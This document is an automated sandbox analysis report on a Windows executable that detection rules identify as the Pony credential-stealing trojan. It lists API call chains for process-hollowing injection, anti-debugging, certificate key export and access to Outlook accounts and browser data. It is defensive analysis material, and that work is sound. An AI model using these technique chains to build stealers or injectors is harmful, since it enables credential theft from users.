              Source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
              Source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
              Source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
              Source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
              Source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
              Source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
              Source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
              Source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
              Source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
              Source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
              Source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
              Source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
              Source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
              Source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
              Source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
              Source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
              Source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTRMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
              Source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTRMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
              Source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTRMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
              Source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTRMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
              Source: a5gvJhukP7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 0_2_00BA1E100_2_00BA1E10
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 0_2_00BA21100_2_00BA2110
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 0_2_00BA13000_2_00BA1300
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_00402D3E1_2_00402D3E
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_00411EE91_2_00411EE9
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_00BA21101_2_00BA2110
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_00BA1E101_2_00BA1E10
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_00BA13001_2_00BA1300
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: String function: 00410514 appears 40 times
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: String function: 00404192 appears 50 times
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: String function: 00401BB8 appears 139 times
              Source: a5gvJhukP7.exe, 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNOD32, vs a5gvJhukP7.exe
              Source: a5gvJhukP7.exe, 00000000.00000000.1658498912.0000000000BAB000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNOD32, vs a5gvJhukP7.exe
              Source: a5gvJhukP7.exe, 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNOD32, vs a5gvJhukP7.exe
              Source: a5gvJhukP7.exeBinary or memory string: OriginalFilename vs a5gvJhukP7.exe
              Source: a5gvJhukP7.exe, 00000001.00000000.1704943301.0000000000BAB000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNOD32, vs a5gvJhukP7.exe
              Source: a5gvJhukP7.exeBinary or memory string: OriginalFilenameNOD32, vs a5gvJhukP7.exe
              Source: a5gvJhukP7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
              Source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
              Source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
              Source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
              Source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
              Source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
              Source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
              Source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
              Source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
              Source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
              Source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
              Source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
              Source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
              Source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
              Source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
              Source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
              Source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTRMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
              Source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTRMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
              Source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTRMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
              Source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTRMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
              Source: a5gvJhukP7.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/0@0/1
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_0040D1E9 CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmpA,lstrcmpA,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,1_2_0040D1E9
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_004027AF LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,1_2_004027AF
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_00402B2A WTSGetActiveConsoleSessionId,CreateToolhelp32Snapshot,Process32First,StrStrIA,ProcessIdToSessionId,OpenProcess,OpenProcessToken,ImpersonateLoggedOnUser,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle,1_2_00402B2A
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_0040A6AF CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree,1_2_0040A6AF
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 0_2_00BA1950 LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,SizeofResource,LoadLibraryExA,GetProcAddress,ExitProcess,0_2_00BA1950
              Source: a5gvJhukP7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile read: C:\Windows\win.iniJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: a5gvJhukP7.exe, 00000001.00000003.1710942974.00000000011F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: a5gvJhukP7.exeReversingLabs: Detection: 89%
              Source: unknownProcess created: C:\Users\user\Desktop\a5gvJhukP7.exe "C:\Users\user\Desktop\a5gvJhukP7.exe"
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeProcess created: C:\Users\user\Desktop\a5gvJhukP7.exe "C:\Users\user\Desktop\a5gvJhukP7.exe"
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeProcess created: C:\Users\user\Desktop\a5gvJhukP7.exe "C:\Users\user\Desktop\a5gvJhukP7.exe"Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeSection loaded: msi.dllJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: a5gvJhukP7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 0.3.a5gvJhukP7.exe.bab604.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.a5gvJhukP7.exe.bab604.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 0_2_00BA433B LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00BA433B
              Source: a5gvJhukP7.exeStatic PE information: real checksum: 0xf6c6 should be: 0x3001d
              Source: a5gvJhukP7.exeStatic PE information: section name: .zdata
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 0_2_00BA3775 push ecx; ret 0_2_00BA3788
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_00BA3775 push ecx; ret 1_2_00BA3788
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 0_2_00BA1300 Sleep,LoadLibraryExA,GetProcAddress,_memset,CreateProcessA,LoadLibraryExA,GetProcAddress,VirtualAlloc,LoadLibraryExA,GetProcAddress,Wow64GetThreadContext,LoadLibraryExA,GetProcAddress,ReadProcessMemory,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,VirtualAllocEx,LoadLibraryExA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,LoadLibraryExA,GetProcAddress,Wow64SetThreadContext,LoadLibraryExA,GetProcAddress,ResumeThread,LoadLibraryExA,GetProcAddress,VirtualFree,0_2_00BA1300
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-13961
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_00405024 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,1_2_00405024
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_00404CB4 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,1_2_00404CB4
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_0040891F FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,1_2_0040891F
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_00403FE7 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,1_2_00403FE7
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_0040966C FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,1_2_0040966C
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_0040879B FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,1_2_0040879B
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_0040443E GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,1_2_0040443E
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: a5gvJhukP7.exe, 00000001.00000002.2897820699.0000000001198000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeAPI call chain: ExitProcess graph end nodegraph_0-3620
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 0_2_00BA229A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00BA229A
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 0_2_00BA1E10 LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,RtlCreateQueryDebugBuffer,GetCurrentProcessId,RtlQueryProcessDebugInformation,OutputDebugStringA,Sleep,RtlDestroyQueryDebugBuffer,0_2_00BA1E10
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 0_2_00BA433B LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00BA433B
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 0_2_00BA1000 mov eax, dword ptr fs:[00000030h]0_2_00BA1000
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_0040F731 mov eax, dword ptr fs:[00000030h]1_2_0040F731
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_00BA1000 mov eax, dword ptr fs:[00000030h]1_2_00BA1000
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 0_2_00BA229A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00BA229A
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 0_2_00BA3DEB _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BA3DEB
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_004102E0 SetUnhandledExceptionFilter,RevertToSelf,1_2_004102E0
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_00BA3DEB _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00BA3DEB
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_00BA229A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00BA229A

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 0_2_00BA1300 Sleep,LoadLibraryExA,GetProcAddress,_memset,CreateProcessA,LoadLibraryExA,GetProcAddress,VirtualAlloc,LoadLibraryExA,GetProcAddress,Wow64GetThreadContext,LoadLibraryExA,GetProcAddress,ReadProcessMemory,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,VirtualAllocEx,LoadLibraryExA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,LoadLibraryExA,GetProcAddress,Wow64SetThreadContext,LoadLibraryExA,GetProcAddress,ResumeThread,LoadLibraryExA,GetProcAddress,VirtualFree,0_2_00BA1300
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeMemory written: C:\Users\user\Desktop\a5gvJhukP7.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_00410042 lstrcmpiA,LogonUserA,lstrlenA,LCMapStringA,LogonUserA,LogonUserA,LoadUserProfileA,ImpersonateLoggedOnUser,RevertToSelf,UnloadUserProfile,CloseHandle,1_2_00410042
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeProcess created: C:\Users\user\Desktop\a5gvJhukP7.exe "C:\Users\user\Desktop\a5gvJhukP7.exe"Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_00404313 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,1_2_00404313
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,1_2_0040443E
